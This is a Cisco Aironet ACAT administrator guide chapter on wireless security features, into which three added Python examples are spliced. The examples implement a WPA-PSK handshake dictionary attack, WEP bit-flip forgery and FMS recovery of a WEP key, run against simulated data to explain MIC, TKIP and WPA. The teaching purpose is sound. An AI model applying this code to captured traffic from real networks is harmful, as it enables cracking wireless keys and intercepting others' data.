Chapter 5
Security Features
This chapter describes the security features. The following topics are covered in the chapter.
• Overview, page 5-2
• Static WEP Keys, page 5-2
• EAP (with Static or Dynamic WEP Keys), page 5-2
• Additional WEP Key Security Features, page 5-7
• Synchronizing Security Features, page 5-8
Cisco Aironet Configuration Administration Tool (ACAT), 1.2 Administrator Guide for Windows
OL-3570-02
5-1
Overview
You can protect your data as it is transmitted through your wireless network by encrypting it with Wired
Equivalent Privacy (WEP) encryption keys. With WEP encryption, the transmitting device encrypts each
packet with a WEP key, and the receiving device uses that same key to decrypt each packet.
The WEP keys used to encrypt and decrypt transmitted data can be statically associated with your
adapter or dynamically created as part of the EAP authentication process. The information in the “Static
WEP Keys” and “EAP (with Static or Dynamic WEP Keys)” sections below can help you to decide
which type of WEP keys to use. Dynamic WEP keys with EAP offer a higher degree of security than
static WEP keys.
WEP keys, whether static or dynamic, are either 40 or 128 bits long. (The 128-bit key is really a 104-bit secret key prefixed by the 24-bit per-packet initialization vector, which is sent in the clear; the 40-bit key uses the same 24-bit IV.) A 128-bit key resists brute-force guessing far better than a 40-bit key, but neither length defends against the IV-based and bit-flip attacks on WEP itself; for those, use the dynamic keys, MIC, TKIP and WPA features described later in this chapter.
Note
Refer to the “Additional WEP Key Security Features” section on page 5-7 for information on three
security features that can make your WEP keys even more secure.
Static WEP Keys
Each device (or profile) within your wireless network can be assigned up to four static WEP keys. If a
device receives a packet that is not encrypted with the appropriate key (as the WEP keys of all devices
that are to communicate with each other must match), the device discards the packet and never delivers
it to the intended receiver.
Static WEP keys are write-only and temporary; therefore, they cannot be read back from the client
adapter, and they are lost when power to the adapter is removed or the Windows device is rebooted.
Although the keys are temporary, you do not need to re-enter them each time the client adapter is inserted
or the Windows device is rebooted because the keys are stored (in an encrypted format, for security
reasons) in the registry of the Windows device. When the driver loads and reads the client adapter’s
registry parameters, it also finds the static WEP keys, decrypts them, and stores them in volatile
memory on the adapter. Note that anything the driver can decrypt, other software running with the same
privileges on that device can decrypt too, so the registry copy is only as safe as the Windows device itself.
The Security Tab window enables you to view the current WEP key settings for the client adapter and
then to assign new WEP keys or overwrite existing WEP keys as well as to enable or disable static WEP.
Refer to the “Entering a New Static WEP Key” section on page 4-14 or “Disabling Static WEP” section
on page 4-15 for instructions.
EAP (with Static or Dynamic WEP Keys)
The new standard for wireless LAN security, as defined by the IEEE, is called 802.1X for 802.11, or
simply 802.1X. An access point that supports 802.1X and its protocol, Extensible Authentication
Protocol (EAP), acts as the interface between a wireless client and an authentication server such as a
RADIUS server, to which the access point communicates over the wired network.
Two 802.1X authentication types can be selected in ACAT for use with Windows operating systems:
• EAP-Cisco Wireless (or LEAP)—This authentication type is available for Windows 95, 98, NT, 2000, Me, and XP, as well as non-Windows systems. Support for LEAP is provided not in the Windows operating system but in your client adapter’s firmware and the Cisco software that supports it. RADIUS servers that support LEAP include Cisco Secure ACS release 2.6 and greater, Cisco Access Registrar release 1.7 and greater, and Funk Software’s Steel-Belted RADIUS release 3.0 and greater.
LEAP can be enabled or disabled for a specific profile through ACAT. When enabled, a variety of configuration options are available, including how and when a username and password are entered to begin the authentication process.
The username and password are used by the client adapter to perform mutual authentication with the RADIUS server through the access point. The username and password are stored in the client adapter’s volatile memory; therefore, they are temporary and need to be re-entered whenever power is removed from the adapter, typically because the client adapter is ejected or the system powers down.
• Host Based EAP—Selecting this option enables you to use any 802.1X authentication type for which your operating system has support. For example, if your operating system uses the Microsoft 802.1X supplicant, it provides native support for EAP-TLS authentication and general support for PEAP and EAP-SIM authentication.
Note
To use EAP-TLS, PEAP, or EAP-SIM you must install the Microsoft 802.1X supplicant and
the PEAP or EAP-SIM security module; configure your client adapter using ACAT or the
ACU; enable the authentication type in Windows; and enable Network-EAP on the access
point.
– EAP-TLS—EAP-TLS is enabled or disabled through the operating system and uses a dynamic
session-based WEP key, which is derived from the client adapter and RADIUS server, to encrypt
data. Once enabled, a few configuration parameters must be set within the operating system.
RADIUS servers that support EAP-TLS include Cisco Secure ACS release 3.0 or greater and
Cisco Access Registrar release 1.8 or greater.
Note
EAP-TLS requires the use of a certificate. Refer to Microsoft’s documentation for
information on downloading and installing the certificate.
– Protected EAP (or PEAP)—PEAP authentication is designed to support One-Time Password
(OTP), Windows NT or 2000 domain, and LDAP user databases over a wireless LAN. It is based
on EAP-TLS authentication but uses a password or PIN instead of a client certificate for
authentication. PEAP is enabled or disabled through the operating system and uses a dynamic
session-based WEP key, which is derived from the client adapter and RADIUS server, to encrypt
data. If your network uses an OTP user database, PEAP requires you to enter either a hardware
token password or a software token PIN to start the EAP authentication process and gain access
to the network. If your network uses a Windows NT or 2000 domain user database or an LDAP
user database (such as NDS), PEAP requires you to enter your username, password, and domain
name in order to start the authentication process.
RADIUS servers that support PEAP authentication include Cisco Secure ACS release 3.1 or
greater and Cisco Access Registrar release 3.5 or greater.
Note
Service Pack 1 for Windows XP and the Microsoft 802.1X supplicant for
Windows 2000 include Microsoft’s PEAP supplicant, which supports a Windows
username and password only and does not operate with Cisco’s PEAP supplicant. To use
Cisco’s PEAP supplicant, install the Install Wizard file after Service Pack 1 for
Windows XP or the Microsoft’s 802.1X supplicant for Windows 2000. Otherwise,
Cisco’s PEAP is overwritten by Microsoft’s PEAP supplicant.
– EAP-SIM—EAP-SIM authentication is designed for use in public wireless LANs and requires
clients equipped with PCSC-compliant smartcard readers. The EAP-SIM supplicant included in
the Install Wizard file supports only Gemplus SIM+ cards; however, an updated supplicant is
available that supports standard GSM-SIM cards as well as more recent versions of the
EAP-SIM protocol. The new supplicant is available for download from the ftpeng FTP server
at the following URL:
ftp://ftpeng.cisco.com/ftp/pwlan/eapsim/CiscoEapSim.dll
Please note that the above requirements are necessary but not sufficient to successfully perform
EAP-SIM authentication. Typically, you are also required to enter into a service contract with
a WLAN service provider, who must support EAP-SIM authentication in its network. Also,
while your PCSC smartcard reader may be able to read standard GSM-SIM cards or chips,
EAP-SIM authentication usually requires your GSM cell phone account to be provisioned for
WLAN service by your service provider.
EAP-SIM is enabled or disabled through the operating system and uses a dynamic session-based
WEP key, which is derived from the client adapter and RADIUS server, to encrypt data.
EAP-SIM requires you to enter a user verification code, or PIN, for communication with the
SIM card. You can choose to have the PIN stored in your computer or to be prompted to enter
it after a reboot or prior to every authentication attempt.
RADIUS servers that support EAP-SIM include Cisco Access Registrar release 3.0 or greater.
Note
Because EAP-TLS, PEAP, and EAP-SIM authentication are enabled in the operating system
and not in ACU, you cannot switch between these authentication types simply by switching
profiles in ACU. You can create a profile in ACU that uses host-based EAP, but you must
enable the specific authentication type in Windows (provided Windows uses the Microsoft
802.1X supplicant). In addition, Windows can be set for only one authentication type at a
time; therefore, if you have more than one profile in ACU that uses host-based EAP and you
want to use another authentication type, you must change authentication types in Windows
after switching profiles in ACU.
When you enable Network-EAP or Require EAP on your access point and configure your client adapter for LEAP, EAP-TLS, PEAP, or EAP-SIM, authentication to the network occurs in the following sequence:
1. The client associates to an access point and begins the authentication process.
Note
The client does not gain full access to the network until authentication between the client and the RADIUS server is successful.
2. Communicating through the access point, the client and RADIUS server complete the authentication process, with the password (LEAP and PEAP), the certificate’s private key (EAP-TLS), or the internal key stored on the SIM card and in the service provider’s Authentication Center (EAP-SIM) being the shared secret for authentication. The password, private key, or internal key is never transmitted during the process; only proofs of its possession are.
3. If authentication is successful, the client and RADIUS server derive a dynamic, session-based WEP key that is unique to the client.
4. The RADIUS server transmits the key to the access point using a secure channel on the wired LAN.
5. For the length of a session, or time period, the access point and the client use this key to encrypt or decrypt all unicast packets (and broadcast packets if the access point is set up to do so) that travel between them.
Refer to the “Enabling LEAP” section on page 4-15 for instructions on enabling LEAP or to the
“Enabling Host-Based EAP” section on page 4-19 for instructions on enabling EAP-TLS, PEAP, or
EAP-SIM.
Refer to the IEEE 802.11 standard for more information on 802.1X authentication and to the following
URL for additional information on RADIUS servers:
http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/12cgcr/secur_c/scprt2/scrad.htm
Wi-Fi Protected Access (WPA)
Wi-Fi Protected Access (WPA) is a standards-based, interoperable security enhancement that strongly
increases the level of data protection and access control for existing and future wireless LAN systems.
It is derived from and will be forward-compatible with the upcoming IEEE 802.11i standard. WPA
leverages Temporal Key Integrity Protocol (TKIP) for data protection and 802.1X for authenticated key
management.
WPA supports two mutually exclusive key management types: WPA and WPA-Pre-shared key
(WPA-PSK). Using WPA key management, clients and the authentication server authenticate to each
other using an EAP authentication method, and the client and server generate a pairwise master key
(PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using
WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that
pre-shared key is used as the PMK.
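The two key-management types differ only in where the PMK comes from; everything below the PMK is the same. The following added example (not Cisco code) derives the WPA-PSK PMK and the pairwise transient key with the IEEE 802.11i definitions (PBKDF2-HMAC-SHA1 with 4096 rounds over the SSID, then the "Pairwise key expansion" PRF), computes the WPA/TKIP EAPOL-Key MIC under the resulting KCK, and then shows why the PSK variant is only as strong as its passphrase: every other input to the MIC is public, so a captured handshake can be checked offline against a word list. The MAC addresses, nonces and `FRAME` bytes are constructed sample values, and `guess_passphrase` is this example's name, not a Cisco or IEEE function.

```python
"""WPA key hierarchy (PSK and EAP share everything below the PMK) and the
offline dictionary attack that WPA-PSK passphrase choice must withstand."""
import hashlib
import hmac


def psk_to_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key (512 bits for TKIP) from the PMK plus public handshake values."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(ptk: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA (TKIP) EAPOL-Key MIC: HMAC-MD5 under the KCK, the first 16 bytes of the PTK."""
    return hmac.new(ptk[:16], eapol_frame_mic_zeroed, hashlib.md5).digest()


def guess_passphrase(candidates, ssid, aa, spa, anonce, snonce, frame, mic):
    """Offline attack on a captured handshake: each guess costs one PBKDF2 plus one PRF."""
    for pw in candidates:
        ptk = derive_ptk(psk_to_pmk(pw, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk, frame), mic):
            return pw
    return None


# Constructed sample handshake values (not a real capture).
SSID = "IEEE"
AA = bytes.fromhex("a0a1a1a3a4a5")          # access point MAC
SPA = bytes.fromhex("b0b1b2b3b4b5")         # client MAC
ANONCE = bytes(range(0xE0, 0xE0 + 32))
SNONCE = bytes(range(0xC0, 0xC0 + 32))
FRAME = b"\x02\x03\x00\x5f\xfe\x01\x09\x00" + bytes(80)  # EAPOL-Key bytes, MIC field zeroed (constructed)


def sample_capture(passphrase: str) -> bytes:
    """The MIC an attacker would have sniffed if this passphrase were in use."""
    ptk = derive_ptk(psk_to_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return eapol_mic(ptk, FRAME)


if __name__ == "__main__":
    print(psk_to_pmk("password", SSID).hex())
    mic = sample_capture("password")
    print(guess_passphrase(["letmein", "password", "hunter2"], SSID, AA, SPA, ANONCE, SNONCE, FRAME, mic))
```

With WPA (EAP) key management the PMK is fresh per session and never derivable from a passphrase, which is why the text recommends it over WPA-PSK for anything beyond small deployments.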
Note
Only 350 series and CB20A cards that are installed on computers running Windows 2000 or XP and
running LEAP or host-based EAP authentication can be used with WPA.
Support for WPA is available in Install Wizard version 1.2 or greater. However, if you want to use
host-based EAP authentication with WPA, you must also install a host supplicant with WPA support.
The following host supplicants are recommended for use with Cisco Aironet client adapters:
• Funk Odyssey Client supplicant release 2.2 (for Windows 2000)
• Windows XP Service Pack 1 and Microsoft supplicant Q815485 (for Windows XP)
Refer to the “Enabling LEAP” section on page 4-15 for instructions on enabling LEAP with WPA or to
the “Enabling Host-Based EAP” section on page 4-19 for instructions on enabling EAP-TLS, PEAP, or
EAP-SIM with WPA.
WPA must also be enabled on the access point. Access points must use Cisco IOS Release 12.2(11)JA
or greater to enable WPA. Refer to the documentation for your access point for instructions on enabling
this feature.
Fast Roaming (CCKM)
Some applications that run on a client device may require fast roaming between access points. For
example, voice applications require seamless roaming to prevent delays and gaps in conversation.
Support for fast roaming is available for LEAP-enabled clients in Install Wizard version 1.1 or later.
During normal operation, LEAP-enabled clients mutually authenticate with a new access point by
performing a complete LEAP authentication, including communication with the main RADIUS server.
However, when you configure your wireless LAN for fast roaming, LEAP-enabled clients securely roam from one access point to another without the need to reauthenticate with the RADIUS server. Using Cisco Centralized Key Management (CCKM), an access point that is configured for wireless domain services (WDS) uses a fast rekeying technique that enables client devices to roam from one access point to another in under 150 milliseconds (ms). Fast roaming ensures that there is no perceptible delay in time-sensitive applications such as wireless Voice over IP (VoIP), enterprise resource planning (ERP), or Citrix-based solutions.
This feature is enabled on the client adapter in two different ways, depending on the software installed:
• If you are using client adapter firmware version 5.30.xx (which is included in Install Wizard version 1.2), you need to enable fast roaming in ACAT or Aironet Client Utility (ACU) version 6.2. Refer to Step 11 in the “Enabling LEAP” section on page 4-15 for details.
• If you are using client adapter firmware version 5.20.17 (which is included in Install Wizard version 1.1), fast roaming is supported automatically.
Regardless of how fast roaming is enabled on the client adapter, it must also be enabled on the access
point.
Note
Access points must use Cisco IOS Release 12.2(11)JA or greater to enable fast roaming. Refer to the
documentation for your access point for instructions on enabling this feature.
Note
If the Microsoft 802.1X supplicant is installed on your computer, you must disable one or two Windows
parameters in order for this feature to operate correctly. Refer to Step 13 in the “Enabling LEAP” section
for details.
Reporting Access Points that Fail LEAP Authentication
Client adapter firmware version 5.02.20 or greater and the following access point software releases support a feature that is designed to detect access points that fail LEAP authentication:
• VxWorks release 12.00T or greater (340, 350, and 1200 series access points)
• Cisco IOS Release 12.2(4)JA or greater (1100 series access points)
An access point running one of these software releases records a message in the system log when a client running firmware version 5.02.20 or greater discovers and reports another access point in the wireless network that has failed LEAP authentication.
The process takes place as follows:
1. A client with a LEAP profile attempts to associate to access point A.
2. Access point A does not handle LEAP authentication successfully, perhaps because the access point does not understand LEAP or cannot communicate with a trusted LEAP authentication server.
3. The client records the MAC address of access point A and the reason why the association failed.
4. The client associates successfully to access point B.
5. The client sends the MAC address of access point A and the reason code for the failure to access point B.
6. Access point B logs the failure in the system log.
Note
This feature does not need to be enabled on the client adapter or access point; it is supported
automatically in both devices. However, the client adapters and access points must use the
firmware versions or software releases shown above (or greater).
Additional WEP Key Security Features
The three security features discussed in this section (MIC, TKIP, and broadcast key rotation) are
designed to prevent sophisticated attacks on your wireless network’s WEP keys. These features do not
need to be enabled on the client adapter; they are supported automatically in the firmware and driver
versions included in the Install Wizard file. However, they must be enabled on the access point.
For instructions on enabling these security features on your access point, refer to the corresponding
software configuration guide or the installation and configuration guide available at the following URL:
http://www.cisco.com/univercd/cc/td/doc/product/wireless/index.htm.
Note
The 340 or 350 series access points require VxWorks 11.10T or greater to enable these security features.
Refer to the documentation for your access point for instructions on enabling these security features.
Message Integrity Check (MIC)
MIC prevents bit-flip attacks on encrypted packets. In a bit-flip attack, an intruder intercepts an
encrypted message, alters it slightly without knowing the key (WEP’s CRC-32 integrity check value is
linear, so the intruder can patch it to match the altered data), and retransmits it, and the receiver accepts
the altered message as legitimate. The MIC adds a few bytes of keyed integrity data to each packet so
that such tampering is detected and the packet is discarded rather than delivered.
The Status window indicates if MIC is being used, and the Statistics window provides MIC statistics.
Note
If you enable MIC on the access point, your client adapter’s driver must support this feature;
otherwise, the client cannot associate.
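The attack the MIC is designed to stop, and the keyed check that stops it, as an added example (not Cisco code). `keystream` is a constructed stand-in for the RC4 output, chosen so the example runs without the real key schedule; the attacker never learns it, and the forgery works against any stream cipher because it relies only on the linearity of CRC-32. The keyed MIC at the end uses truncated HMAC-SHA1 as an illustration; it is not Cisco’s MMH MIC, but it has the property that matters here: it cannot be patched without the MIC key.

```python
"""Why a CRC-32 ICV is not a MIC: forging a WEP-protected frame by bit-flipping."""
import hashlib
import hmac
import struct
import zlib

_WEP_KEY = b"\x0b\xad\xc0\xff\xee"          # constructed; unknown to the attacker


def keystream(iv: bytes, n: int) -> bytes:
    """Stand-in for RC4(IV || key) output: deterministic per IV, secret to the attacker."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(_WEP_KEY + iv + bytes([ctr])).digest()
        ctr += 1
    return out[:n]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(data))       # WEP's ICV: CRC-32, little-endian


def wep_protect(iv: bytes, data: bytes) -> bytes:
    """Transmitter: encrypt data || ICV under the keystream for this IV."""
    return xor(data + icv(data), keystream(iv, len(data) + 4))


def wep_unprotect(iv: bytes, body: bytes):
    """Receiver: decrypt and accept only if the ICV matches; None on mismatch."""
    plain = xor(body, keystream(iv, len(body)))
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


def bit_flip(body: bytes, delta: bytes) -> bytes:
    """Attacker: XOR `delta` into the ciphertext and patch the encrypted ICV so it still
    verifies. Needs neither key nor plaintext, because CRC-32 is linear:
    crc(a ^ d) == crc(a) ^ crc(d) ^ crc(zeros of the same length)."""
    n = len(body) - 4
    assert len(delta) == n
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(b"\x00" * n)
    return xor(body, delta + struct.pack("<I", icv_delta))


def mic_protect(iv: bytes, data: bytes, mic_key: bytes) -> bytes:
    """Keyed MIC over IV || data, appended before WEP encryption (illustrative, not MMH)."""
    tag = hmac.new(mic_key, iv + data, hashlib.sha1).digest()[:8]
    return wep_protect(iv, data + tag)


def mic_unprotect(iv: bytes, body: bytes, mic_key: bytes):
    plain = wep_unprotect(iv, body)
    if plain is None:
        return None
    data, tag = plain[:-8], plain[-8:]
    good = hmac.new(mic_key, iv + data, hashlib.sha1).digest()[:8]
    return data if hmac.compare_digest(tag, good) else None


def demo():
    """Returns (what the receiver accepts with ICV only, what it accepts with a MIC)."""
    iv = b"\x01\x02\x03"
    original = b"PAY 100 TO ALICE"
    delta = xor(original, b"PAY 900 TO ALICE")       # attacker needs only the diff at known offsets
    forged_plain = wep_unprotect(iv, bit_flip(wep_protect(iv, original), delta))
    mic_key = b"mic-key-shared-by-both-ends"         # constructed
    body = mic_protect(iv, original, mic_key)
    mic_result = mic_unprotect(iv, bit_flip(body, delta + b"\x00" * 8), mic_key)
    return forged_plain, mic_result


if __name__ == "__main__":
    print(demo())    # ICV-only receiver accepts the forged amount; MIC receiver returns None
```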
Temporal Key Integrity Protocol (TKIP)
This feature, also referred to as WEP key hashing, defends against an attack on WEP in which the
intruder uses the initialization vector (IV) in encrypted packets to calculate the WEP key. TKIP removes
the predictability that an intruder relies on to determine the WEP key by exploiting IVs. It protects both
unicast and broadcast WEP keys.
Note
If you enable TKIP on the access point, your client adapter’s firmware must support this feature;
otherwise, the client cannot associate.
Note
TKIP is automatically enabled whenever WPA is enabled and disabled whenever WPA is disabled.
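The IV-based attack the paragraph above refers to, carried out against a 40-bit static key, as an added example (not Cisco code). RC4 is the real cipher and the attack is the Fluhrer-Mantin-Shamir "weak IV" attack: every WEP frame starts with the known SNAP byte 0xAA, so the first keystream byte of each frame is public, and IVs of the form (A+3, 255, x) leak key byte A with roughly 5% probability each. The sniffer is simulated, `SECRET` is a constructed key, and `mixed_packet_key` is an illustrative stand-in for per-packet key mixing, not Cisco’s key-hashing algorithm; it is there to show that once the RC4 key no longer begins with the public IV, the same captured traffic yields nothing.

```python
"""FMS recovery of a static WEP key from captured IVs, and its failure under key mixing."""
import hashlib

SECRET = bytes.fromhex("0badc0ffee")        # constructed 40-bit static WEP key


def rc4_ksa(key: bytes):
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_byte(key: bytes) -> int:
    """First keystream byte (PRGA step 1). Public for WEP: it is 0xAA ^ ciphertext[0]."""
    S = rc4_ksa(key)
    j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def weak_ivs(key_len: int = 5):
    """IVs of the form (A+3, 255, x): 'resolved' for key byte A with high probability."""
    return [bytes([a + 3, 255, x]) for a in range(key_len) for x in range(256)]


def mixed_packet_key(secret: bytes, iv: bytes) -> bytes:
    # Stand-in for per-packet key mixing: the RC4 key no longer starts with the public IV.
    return hashlib.sha256(secret + iv).digest()[:16]


def sniff(secret: bytes, ivs, mixer=None):
    """Simulated capture: (iv, first keystream byte) for each frame."""
    return [(iv, rc4_first_byte(iv + secret if mixer is None else mixer(secret, iv))) for iv in ivs]


def fms_vote(known: bytes, iv: bytes, ks0: int):
    """Candidate for key byte len(known) if the IV is resolved for the known prefix, else None."""
    A = len(known)
    K = iv + known                           # attacker assumes RC4 key = IV || secret
    S, j = list(range(256)), 0
    for i in range(A + 3):                   # replay the KSA over the part of the key we know
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
        return None                          # not resolved: first output byte not tied to S[A+3]
    return (S.index(ks0) - j - S[A + 3]) & 0xFF


def recover_key(frames, key_len: int = 5, fudge: int = 3, known: bytes = b""):
    """Vote on each key byte in turn; try the top `fudge` candidates depth-first and
    accept a full key only if it reproduces the captured keystream bytes."""
    if len(known) == key_len:
        ok = all(rc4_first_byte(iv + known) == ks0 for iv, ks0 in frames[:8])
        return known if ok else None
    votes = [0] * 256
    for iv, ks0 in frames:
        c = fms_vote(known, iv, ks0)
        if c is not None:
            votes[c] += 1
    for b in sorted(range(256), key=lambda v: -votes[v])[:fudge]:
        found = recover_key(frames, key_len, fudge, known + bytes([b]))
        if found is not None:
            return found
    return None


if __name__ == "__main__":
    print("plain WEP  :", recover_key(sniff(SECRET, weak_ivs())))
    print("mixed keys :", recover_key(sniff(SECRET, weak_ivs(), mixed_packet_key), fudge=1))
```

Only 1280 frames are needed here because the sniffer was handed exactly the weak IVs; on a real network the attacker waits for them to appear, which with a 24-bit IV space and a static key is a matter of hours, not years. That is the predictability the key-hashing feature removes.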
Broadcast Key Rotation
EAP authentication provides dynamic unicast WEP keys for client devices but uses static broadcast, or
multicast, keys. When you enable broadcast WEP key rotation, the access point provides a dynamic
broadcast WEP key and changes it at the interval you select. When you enable this feature, only wireless
client devices using LEAP, EAP-TLS, PEAP, or EAP-SIM authentication can associate to the access
point. Client devices using static WEP (with open or shared key authentication) cannot associate.
Synchronizing Security Features
In order to use any of the security features discussed in this section, both your client adapter and the
access point to which it associates must be set appropriately. Table 5-1 indicates the client and access
point settings required for each security feature. Refer to Chapter 2, “Installed Components Tab,” and
the “Security Tab” section on page 4-10 for installation and configuration instructions for your client
adapter’s security features. Refer to the documentation for your access point for instructions on enabling
any of these features for your access point.
Table 5-1   Client and Access Point Security Settings

Static WEP with open authentication
Client setting: Enable Static WEP and Open Access Point Authentication and create a WEP key.
Access point setting: Set up and enable WEP and enable Open Authentication for the SSID.

Static WEP with shared key authentication
Client setting: Enable Static WEP and Shared Key Access Point Authentication and create a WEP key.
Access point setting: Set up and enable WEP and enable Shared Key Authentication for the SSID.

LEAP authentication
Client setting: Install the LEAP security module and enable LEAP.
Access point setting: Set up and enable WEP and enable EAP for the SSID.

LEAP authentication with WPA
Client setting: Install the LEAP security module. Enable WPA and LEAP.
Note
To enable the client adapter to associate to both WPA and non-WPA access points, enable Allow Association to both WPA and non-WPA authenticators.
Access point setting: Select a cipher suite; set up and enable WEP; and enable EAP and WPA for the SSID.
Note
To enable both WPA and non-WPA client adapters to use the SSID, enable optional WPA.

EAP-TLS authentication
Client setting (if using ACAT or ACU to configure the client adapter): Enable Host Based EAP and Dynamic WEP in ACAT or ACU and, in Windows, select Enable network access control using IEEE 802.1X and Certificates (or Smart Card or other Certificate) as the EAP Type.
Client setting (if using Windows XP to configure the client adapter): In Windows, select Enable network access control using IEEE 802.1X and Smart Card or other Certificate as the EAP Type.
Access point setting: Set up and enable WEP and enable EAP and Open Authentication for the SSID.

EAP-TLS authentication with WPA
Client setting (if using ACAT or ACU to configure the client adapter): Enable WPA, Host Based EAP and Dynamic WEP in ACAT or ACU and, in Windows, enable WPA or WPA-PSK and select Enable network access control using IEEE 802.1X and Certificates (or Smart Card or other Certificate) as the EAP Type.
Client setting (if using Windows XP to configure the client adapter): In Windows, enable WPA or WPA-PSK and select Enable network access control using IEEE 802.1X and Smart Card or other Certificate as the EAP Type.
Access point setting: Select a cipher suite; set up and enable WEP; and enable EAP, Open Authentication, and WPA for the SSID.
Note
To enable both WPA and non-WPA client adapters to use the SSID, enable optional WPA.

PEAP authentication
Client setting (if using ACAT or ACU to configure the client adapter): Install the PEAP security module. Enable Host Based EAP and Dynamic WEP in ACAT or ACU and, in Windows, select Enable network access control using IEEE 802.1X and PEAP as the EAP Type.
Client setting (if using Windows XP to configure the client adapter): In Windows, select Enable network access control using IEEE 802.1X and PEAP as the EAP Type.
Access point setting: Set up and enable WEP and enable EAP and Open Authentication for the SSID.

PEAP authentication with WPA
Client setting (if using ACAT or ACU to configure the client adapter): Enable WPA, Host Based EAP and Dynamic WEP in ACAT or ACU and, in Windows, enable WPA or WPA-PSK and select Enable network access control using IEEE 802.1X and PEAP as the EAP Type.
Client setting (if using Windows XP to configure the client adapter): In Windows, enable WPA or WPA-PSK and select Enable network access control using IEEE 802.1X and PEAP as the EAP Type.
Access point setting: Select a cipher suite; set up and enable WEP; and enable EAP, Open Authentication, and WPA for the SSID.
Note
To enable both WPA and non-WPA client adapters to use the SSID, enable optional WPA.

EAP-SIM authentication
Client setting (if using ACAT or ACU to configure the client adapter): Install the EAP-SIM security module. Enable Host Based EAP and Dynamic WEP in ACAT or ACU and, in Windows, select Enable network access control using IEEE 802.1X (or Enable IEEE 802.1X authentication for the network) and SIM Authentication as the EAP Type.
Client setting (if using Windows XP to configure the client adapter): In Windows, select Enable network access control using IEEE 802.1X and SIM Authentication as the EAP Type.
Access point setting: Set up and enable WEP and enable EAP and Open Authentication for the SSID.

EAP-SIM authentication with WPA
Client setting (if using ACAT or ACU to configure the client adapter): Install the EAP-SIM security module. Enable WPA, Host Based EAP and Dynamic WEP in ACAT or ACU and, in Windows, enable WPA or WPA-PSK and select Enable network access control using IEEE 802.1X (or Enable IEEE 802.1X authentication for the network) and SIM Authentication as the EAP Type.
Client setting (if using Windows XP to configure the client adapter): In Windows, enable WPA or WPA-PSK and select Enable network access control using IEEE 802.1X and SIM Authentication as the EAP Type.
Access point setting: Select a cipher suite; set up and enable WEP; and enable EAP, Open Authentication, and WPA for the SSID.
Note
To enable both WPA and non-WPA client adapters to use the SSID, enable optional WPA.

Fast roaming (CCKM)
Client setting: Enable LEAP and select Allow Fast Roaming (CCKM) (firmware version 5.30.xx); with firmware version 5.20.17, fast roaming is enabled automatically.
Access point setting: Use Cisco IOS Release 12.2(11)JA or greater, select a cipher suite, and enable open authentication with EAP and CCKM for the SSID.
Note
To enable both 802.1X clients and non-802.1X clients to use the SSID, enable optional CCKM.

Reporting access points that fail LEAP authentication
Client setting: No settings required; automatically enabled in firmware version 5.02.20 or greater.
Access point setting: No settings required; automatically enabled in the following software releases:
• VxWorks release 12.00T or greater (340, 350, and 1200 series access points)
• Cisco IOS Release 12.2(4)JA or greater

MIC
Client setting: No settings required; automatically enabled by the firmware included in the Install Wizard file.
Access point setting: Set up and enable WEP with full encryption, set MIC to MMH, and set Use Aironet Extensions to Yes.

TKIP
Client setting: No settings required; automatically enabled by the firmware included in the Install Wizard file.
Access point setting: Set up and enable WEP, set TKIP to Cisco, and set Use Aironet Extensions to Yes.

Broadcast key rotation
Client setting: Enable LEAP, EAP-TLS, PEAP or EAP-SIM and use the firmware included in the Install Wizard file.
Access point setting: Set up and enable WEP and set Broadcast WEP Key Rotation Interval to any value other than zero (0).